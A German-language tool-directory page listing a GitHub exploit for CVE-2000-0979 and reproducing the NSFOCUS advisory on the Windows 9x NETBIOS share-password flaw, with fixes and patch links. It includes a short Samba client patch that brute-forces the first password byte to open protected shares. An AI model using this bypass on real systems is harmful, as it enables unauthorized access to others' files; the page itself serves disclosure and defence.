Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
Tools/GitHubGitHub/z6543/cve-2000-0979
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration Testing
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

Repository anzeigen
22vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2000-0979

CVE-2000-0979.rb ist das eigenständige Tool, um CVE-2000-0979 gegen den Windows 95 SMB-Dienst auszunutzen.

msf_2000_0979.rb ist das Metasploit-Modul. Sie können dies in ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩ kopieren.

MSF module

Weitere Dokumentation folgt in Kürze!

Ursprüngliche Sicherheitshinweise

NSFOCUS Security Advisory (SA2000-05)

Thema: Microsoft Windows 9x NETBIOS-Passwortüberprüfungs-Schwachstelle

Veröffentlichungsdatum: 24. August 2000 Aktualisierungsdatum: 11. Oktober 2000

Betroffene Systeme

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

Nicht betroffene Systeme

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

Auswirkungen

In dem von Microsoft Windows 9x NETBIOS-Protokollimplementierung verwendeten Passwortüberprüfungsmechanismus existiert eine Schwachstelle. Diese Schwachstelle ermöglicht es jedem Benutzer, auf den passwortgeschützten Dateifreigabedienst von Windows 9x zuzugreifen. Der Angreifer muss das Freigabepasswort nicht kennen.

Beschreibung

Sie können ein Passwort festlegen, um die gemeinsam genutzten Ressourcen eines Microsoft Windows 9x-Systems zu schützen. In dem von Microsoft Windows 9x NETBIOS-Protokollimplementierung verwendeten Passwortüberprüfungsmechanismus existiert jedoch eine Schwachstelle. Bei der Überprüfung des Passworts hängt die Länge des Passworts von der Länge der vom Client an den Server gesendeten Daten ab. Das heißt: Wenn ein Client die Länge des Passworts auf ein Byte setzt und das Paket mit dem Klartext-Passwort an den Server sendet, vergleicht der Server es nur mit dem ersten Byte des Freigabepassworts (Klartext). Bei Übereinstimmung ist der Überprüfungsvorgang abgeschlossen. Ein Angreifer muss lediglich das erste Byte des Passworts beim Opfer erraten und ausprobieren. Das Windows 9x-Fernverwaltungssystem ist ebenfalls betroffen, da es die gleiche Methode zur Authentifizierung von Freigabepasswörtern verwendet.

Exploit

Hier ist ein einfaches Beispiel, um diesen Fehler zu demonstrieren. Holen Sie sich das Samba-Quellpaket und ändern Sie source/client/client.c wie folgt:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

Problemumgehung

Schließen Sie den Microsoft Datei- und Druckfreigabedienst.

Lösung

Microsoft wurde informiert und hat ein Sicherheitsbulletin zu diesem Fehler veröffentlicht.

Das Bulletin ist abrufbar unter:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

Patches sind verfügbar unter:

. Microsoft Windows 95

Patch in Kürze verfügbar

. Microsoft Windows 98 und 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

HAFTUNGSAUSSCHLUSS

DIE BEREITGESTELLTEN INFORMATIONEN WERDEN VON NSFOCUS OHNE JEGLICHE GEWÄHRLEISTUNG ZUR VERFÜGUNG GESTELLT. NSFOCUS LEHNT ALLE GEWÄHRLEISTUNGEN, SOWOHL AUSDRÜCKLICH ALS AUCH STILLSCHWEIGEND, AB, MIT AUSNAHME DER GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT. IN KEINEM FALL HAFTET NSFOCUS FÜR IRGENDWELCHE SCHÄDEN, EINSCHLIESSLICH DIREKTER, INDIREKTER, ZUFÄLLIGER, FOLGESCHÄDEN, VERLUST VON GESCHÄFTSGEWINNEN ODER BESONDERER SCHÄDEN, SELBST WENN NSFOCUS AUF DIE MÖGLICHKEIT SOLCHER SCHÄDEN HINGEWIESEN WURDE. DIE VERBREITUNG ODER VERVIELFÄLTIGUNG DER INFORMATIONEN IST UNTER DER VORAUSSETZUNG GESTATTET, DASS DIE HINWEISE IN KEINER WEISE VERÄNDERT WERDEN.

© Copyright 1999-2000 NSFOCUS. Alle Rechte vorbehalten. Nutzungsbedingungen.

NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

Tool herunterladen